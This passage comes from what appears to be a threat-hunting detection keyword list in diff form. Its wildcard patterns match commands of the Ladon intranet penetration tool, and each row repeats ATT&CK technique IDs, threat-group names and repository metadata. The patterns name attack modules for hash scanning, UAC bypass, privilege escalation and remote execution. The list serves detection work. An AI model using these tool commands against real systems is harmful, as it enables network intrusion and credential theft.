loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *LdapScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *SMBGhost*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *SmbHashScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *SmbScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *SshScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *TomcatScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *VncScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *WebScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *WinrmScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *WmiHashScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *WmiScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon ActiveAdmin*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon ActiveGuest*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon AdiDnsDump *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon at c:*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon AtExec*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon AutoRun*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon BadPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon BypassUAC*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon CheckDoor*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
